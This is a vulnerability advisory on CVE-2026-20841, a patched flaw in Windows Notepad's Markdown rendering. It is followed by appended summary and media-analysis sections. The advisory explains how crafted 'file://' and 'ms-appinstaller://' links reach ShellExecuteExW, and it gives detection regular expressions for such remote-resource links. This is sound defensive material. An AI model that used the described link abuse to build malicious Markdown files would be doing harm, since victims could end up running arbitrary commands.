In this excerpt of a TrendAI Research Services vulnerability report, Nikolai Skliarenko and Yazhi Wang of the TrendAI Research team detail a recently patched command injection vulnerability in the Windows Notepad application. This bug was originally discovered by Cristian Papa and Alasdair Gorniak of Delta Obscura. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim's account. The following is a portion of their write-up covering CVE-2026-20841, with a few minimal modifications.
A remote code execution vulnerability has been reported in Microsoft Windows Notepad. The vulnerability is due to improper validation of links in Markdown files.
A remote attacker could exploit this vulnerability by enticing the victim to download and interact with a malicious file. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim's account.
The Vulnerability
Microsoft Windows comes with a default text-editing application called Windows Notepad. Historically, this application offered only minimal editing features. However, modern versions of Windows include an improved and extended Notepad by default. This new version supports multiple file formats, Markdown rendering, and Copilot-enhanced features.
Markdown is a lightweight markup language that allows users to create formatted text using a simple syntax. It is widely used for writing documents, blog posts, and README files. It supports a wide range of formatting options, including (but not limited to) headers, styled text, numbered and bulleted lists, and links. Markdown supports two main link formats: standard and inline. The standard link format is:
[link-name](link/path)
When rendered, only the link text ("link-name") is shown to the user.
The inline links use the following format:
When rendered, they are transformed into the equivalent standard link:
[link/path](link/path)
A remote code execution vulnerability has been reported in Microsoft Windows Notepad. The vulnerability is due to improper validation of links when handling Markdown files.
When Notepad opens a file, if the application detects that the file requires special rendering (in this case, Markdown), the input file is tokenized. Tokenization in this context means splitting the raw file text into a sequence of small, recognizable pieces ("tokens") that the renderer can process one by one. Detection is performed based on the file extension. Only the ".md" extension was found to trigger Markdown rendering, as the application uses a fixed string comparison to determine whether Markdown should be rendered by calling sub_1400ED5D0()
. Markdown files are rendered token by token.
Function sub_140170F60()
handles clicking on links in Markdown files. It filters the link value, and passes it to ShellExecuteExW()
call.
The filtering performed on the link is found to be insufficient, as it allows using malicious crafted protocol URIs, such as "file://" and "ms-appinstaller://", to execute arbitrary files in the security context of victim. ShellExecuteExW()
uses the configured protocol handlers and may expose additional exploitable protocols depending on the system configuration.
A remote attacker could exploit this vulnerability by enticing the victim to download a malicious crafted Markdown file, open it, and click on a malicious link. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim's account.
Notes
• Files using the ".md" file extension are not registered to be opened by Notepad by default. However, when opened manually in Notepad, they are rendered as Markdown, which allows the vulnerability to be triggered.
• Any "\\" sequences are converted to "\" in the attacker-controlled link path prior to passing it to the ShellExecuteExW()
call.
Source Code Walkthrough
The following code snippet was taken from Notepad.exe version 11.2508. Comments added by TrendAI researchers have been highlighted.
In sub_140170F60()
:
Detection Guidance
To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the following application protocols that can be used to deliver an attack to exploit this vulnerability:
• FTP, over ports 21/TCP, 20/TCP
• HTTP, over port 80/TCP
• HTTPS, over port 443/TCP
• IMAP, over port 143/TCP
• NFS, over ports 2049/TCP, 2049/UDP, 111/TCP, 111/UDP
• POP3, over port 110/TCP
• SMTP, over ports 25/TCP, 587/TCP
• SMB/CIFS, over ports 139/TCP, 445/TCP
The detection device must inspect traffic transferring a Markdown file with the file extension ".md". If such a file transfer is found, the detection device must search the file content for links.
The detection device must check whether the link paths contain the strings "file:" or "ms-appinstaller:".
If "file:" was found, the detection device must search the Markdown file contents using the following case-insensitive regular expression:
(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
If "ms-appinstaller:" was found, the detection device must search the Markdown file contents using the following case-insensitive regular expression:
(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
If any of the regular expressions matches, the link contains a path to a remote resource. The traffic must be considered malicious; an attack exploiting this vulnerability is likely underway. This guidance should also detect the public PoC that was recently posted on GitHub.
Notes
• The string matches are case-insensitive.
• The detection guidance is based on the vendor-provided patch. However, the patch restricts the links to local-only files and HTTP(S) URIs, which may result in a huge number of false positives. Because of that, the detection guidance focuses on formats that may access and execute remote files. Due to that, it may result in false negatives.
• The vulnerable function uses the configured protocol handlers and may expose additional exploitable protocols depending on the system configuration.
Conclusion
This vulnerability was patched by Microsoft in the February 2026 release cycle. They note no workarounds but do list user interaction as a prerequisite to exploitation. To fully remediate the vulnerability, the proper action is to test and deploy the provided vendor patch.
Special thanks to Nikolai Skliarenko and Yazhi Wang of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI Research services please visit https://go.trendmicro.com/tis/vulnerabilities.html
The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
Facts Only
A command injection vulnerability (CVE-2026-20841) was discovered in Microsoft Windows Notepad.
The vulnerability was originally found by Cristian Papa and Alasdair Gorniak of Delta Obscura.
TrendAI Research Services analysts Nikolai Skliarenko and Yazhi Wang provided a detailed analysis.
The flaw involves improper validation of links in Markdown files when rendered by Notepad.
Exploitation requires a victim to open a malicious `.md` file and click a crafted link.
The vulnerability allows arbitrary command execution in the context of the victim's account.
The issue was patched by Microsoft in the February 2026 release cycle.
Notepad's Markdown rendering is triggered only for files with the `.md` extension.
The vulnerable function `sub140170F60()` processes link clicks and passes them to `ShellExecuteExW()`.
Detection involves monitoring file transfers and inspecting Markdown content for "file:" or "ms-appinstaller:" protocols.
The patch restricts links to local files and HTTP(S) URIs, potentially increasing false positives.
Executive Summary
Full Take
This vulnerability narrative presents a textbook case of how feature expansion in legacy software can introduce unintended attack surfaces. The strongest version of this story—its steelman—highlights legitimate security research uncovering a non-obvious flaw in a widely used application, with clear technical details and responsible disclosure. The analysis deserves credit for its precision in describing the exploit chain and detection methods.
Pattern-wise, the framing leans toward technical authority without overt manipulation, though the emphasis on "remote code execution" could subtly amplify perceived risk (ARC-0012 Fear Appeal). The detection guidance's acknowledgment of false positives and negatives adds necessary nuance, resisting the temptation to oversimplify. The root cause here is the tension between usability (Markdown support in Notepad) and security (protocol handler validation), a recurring paradigm in software development where convenience often outpaces threat modeling.
The implications extend beyond this single CVE. For human agency, it underscores how even mundane tools can become vectors for exploitation when functionality expands without proportional security scrutiny. The costs are borne by end users who must now patch or risk compromise, while the benefits accrue to security researchers and vendors who strengthen their reputations through responsible disclosure.
Bridge questions: How might Microsoft's shift toward AI-enhanced features (like Copilot integration) introduce similar vulnerabilities in other legacy applications? What trade-offs between functionality and security should users demand from software vendors? Would a more restrictive default file association policy for `.md` files have mitigated this risk?
Counterstrike scan: A coordinated influence campaign exploiting this narrative might weaponize it to erode trust in Microsoft's security practices or push for mandatory patching policies. However, the content here aligns with legitimate security research rather than a manipulative playbook—no forced binaries, no emotional exploitation, just technical analysis. The absence of alarmist language or calls to action suggests healthy alignment with factual reporting.
Patterns detected: ARC-0012 Fear Appeal (minor, in emphasis on "remote code execution")
Sentinel — Human
This TrendAI Research Services vulnerability report shows signs of being written by a human. The article displays slight stylometric deviations, includes personal voice and idiosyncratic emphasis, and provides unique insights and details that are not found verbatim in other sources.
